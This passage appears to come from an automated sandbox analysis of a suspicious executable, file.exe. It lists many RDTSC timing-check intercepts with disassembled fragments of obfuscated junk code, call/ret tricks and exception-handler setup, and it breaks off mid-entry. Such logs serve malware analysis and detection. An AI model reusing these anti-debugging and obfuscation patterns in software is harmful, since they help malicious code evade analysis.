          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A28C second address: 59A290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A290 second address: 59A296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A296 second address: 59A2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F37B4535CE1h 0x0000000c jnp 00007F37B4535CD6h 0x00000012 popad 0x00000013 jl 00007F37B4535CDAh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F37B4535CE6h 0x00000025 jmp 00007F37B4535CE3h 0x0000002a pop edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A2F0 second address: 59A2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5627A1 second address: 5627C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F37B4535CD6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A9F3 second address: 59AA1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F37B4537096h 0x00000009 jmp 00007F37B45370A8h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59AA1E second address: 59AA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE1h 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59ACD2 second address: 59ACD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59ACD6 second address: 59ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B133 second address: 59B157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B453709Ch 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B45370A0h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E55C second address: 59E560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59EB97 second address: 59EB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59EB9B second address: 59EBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push esi 0x0000000d jbe 00007F37B4535CD6h 0x00000013 pop esi 0x00000014 jmp 00007F37B4535CDCh 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push edx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59EBC2 second address: 59EBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jc 00007F37B4537096h 0x00000012 jmp 00007F37B45370A0h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F37B45370A7h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DBB8 second address: 59DBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F37B4535CD6h 0x0000000a popad 0x0000000b jo 00007F37B4535CDCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DBCB second address: 59DBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B45370A2h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DBE5 second address: 59DBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A000D second address: 5A0012 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0012 second address: 5A0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE7h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B4535CE2h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0042 second address: 5A0046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E521 second address: 56E527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E527 second address: 56E532 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E532 second address: 56E538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5A08 second address: 5A5A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5A0C second address: 5A5A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5B7C second address: 5A5B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F37B4537096h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5B8B second address: 5A5B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5B8F second address: 5A5BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F37B45370A2h 0x0000000f jbe 00007F37B4537096h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5BB7 second address: 5A5BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5BBF second address: 5A5BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5D37 second address: 5A5D50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F37B4535CD6h 0x00000008 jnp 00007F37B4535CD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jns 00007F37B4535CD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A650C second address: 5A6545 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F37B4537096h 0x00000008 jmp 00007F37B45370A5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F37B453709Ch 0x00000015 pop edx 0x00000016 pushad 0x00000017 push esi 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pop esi 0x0000001b jo 00007F37B453709Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A82B7 second address: 5A82BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A82BC second address: 5A82C6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F37B453709Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A82C6 second address: 5A82EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 398901C5h 0x0000000d je 00007F37B4535CDCh 0x00000013 mov edi, dword ptr [ebp+122D37BCh] 0x00000019 push 3F2ACDCCh 0x0000001e jc 00007F37B4535CF0h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8460 second address: 5A8481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B453709Bh 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F37B453709Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A865F second address: 5A8665 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8E42 second address: 5A8E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8E4A second address: 5A8E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8F2D second address: 5A8F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8F31 second address: 5A8F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8F35 second address: 5A8F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93D3 second address: 5A93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93D7 second address: 5A93F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B45370A7h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A99B0 second address: 5A9A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F37B4535CDCh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2288h], eax 0x00000016 push 00000000h 0x00000018 mov esi, eax 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F37B4535CD8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9A08 second address: 5A9A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA323 second address: 5AA32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA32D second address: 5AA331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA1C9 second address: 5AA1E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B4535CE0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA1E7 second address: 5AA1EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3B9 second address: 5AA3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3BE second address: 5AA3C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F37B4537096h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3C8 second address: 5AA3F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F37B4535CEFh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB478 second address: 5AB4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F37B453709Dh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F37B4537098h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 jmp 00007F37B453709Bh 0x0000002c push 00000000h 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 add edi, dword ptr [ebp+122D3780h] 0x00000037 push eax 0x00000038 jnp 00007F37B453709Eh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AAB16 second address: 5AAB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD416 second address: 5AD42D instructions: 0x00000000 rdtsc 0x00000002 je 00007F37B4537098h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F37B4537096h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD42D second address: 5AD43D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4333 second address: 5B4339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4339 second address: 5B433D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF313 second address: 5AF325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B44CB second address: 5B44D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B54A5 second address: 5B5526 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B4537098h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D356Eh], edx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F37B4537098h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F37B4537098h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov eax, dword ptr [ebp+122D06DDh] 0x0000005d sub ebx, 590A7652h 0x00000063 push FFFFFFFFh 0x00000065 add dword ptr [ebp+122D2159h], eax 0x0000006b nop 0x0000006c push eax 0x0000006d push edx 0x0000006e push esi 0x0000006f push esi 0x00000070 pop esi 0x00000071 pop esi 0x00000072 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B62EE second address: 5B62F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5526 second address: 5B552D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B738F second address: 5B73B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F37B4535CDDh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B8442 second address: 5B845D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F37B453709Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9212 second address: 5B9217 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B845D second address: 5B8461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD0A3 second address: 5BD0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD0A7 second address: 5BD0AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD630 second address: 5BD636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE568 second address: 5BE576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B453709Ah 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE576 second address: 5BE594 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F37B4535CE3h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE594 second address: 5BE61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F37B45370A1h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F37B4537098h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 xor dword ptr [ebp+122D195Ah], esi 0x0000002f pop ebx 0x00000030 mov bl, 78h 0x00000032 push 00000000h 0x00000034 call 00007F37B45370A8h 0x00000039 mov edi, ebx 0x0000003b pop edi 0x0000003c xchg eax, esi 0x0000003d jng 00007F37B45370AEh 0x00000043 pushad 0x00000044 jmp 00007F37B45370A4h 0x00000049 push eax 0x0000004a pop eax 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 pushad 0x00000051 popad 0x00000052 pop eax 0x00000053 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD88E second address: 5BD892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD892 second address: 5BD8AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F37B4537098h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007F37B4537096h 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE868 second address: 5BE89B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b js 00007F37B4535CE6h 0x00000011 jmp 00007F37B4535CE0h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF696 second address: 5BF69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C250B second address: 5C25D4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F37B4535CE1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F37B4535CE0h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F37B4535CD8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c xor dword ptr [ebp+122D20ACh], ebx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F37B4535CD8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e call 00007F37B4535CE4h 0x00000053 call 00007F37B4535CE2h 0x00000058 ja 00007F37B4535CD6h 0x0000005e pop edi 0x0000005f pop ebx 0x00000060 push 00000000h 0x00000062 jns 00007F37B4535CDCh 0x00000068 xchg eax, esi 0x00000069 push edi 0x0000006a push eax 0x0000006b jmp 00007F37B4535CDAh 0x00000070 pop eax 0x00000071 pop edi 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F37B4535CDBh 0x0000007a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C1600 second address: 5C160A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C160A second address: 5C160E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C160E second address: 5C1696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F37B45370A4h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F37B4537098h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 call 00007F37B453709Ch 0x0000002d pushad 0x0000002e xor esi, dword ptr [ebp+122D3A08h] 0x00000034 movsx edx, si 0x00000037 popad 0x00000038 pop edi 0x00000039 push dword ptr fs:[00000000h] 0x00000040 mov dword ptr [ebp+122D328Ah], edx 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d mov dword ptr [ebp+1244C01Ah], ebx 0x00000053 mov eax, dword ptr [ebp+122D0565h] 0x00000059 mov dword ptr [ebp+122D2DE6h], ebx 0x0000005f push FFFFFFFFh 0x00000061 mov ebx, dword ptr [ebp+122D396Ch] 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 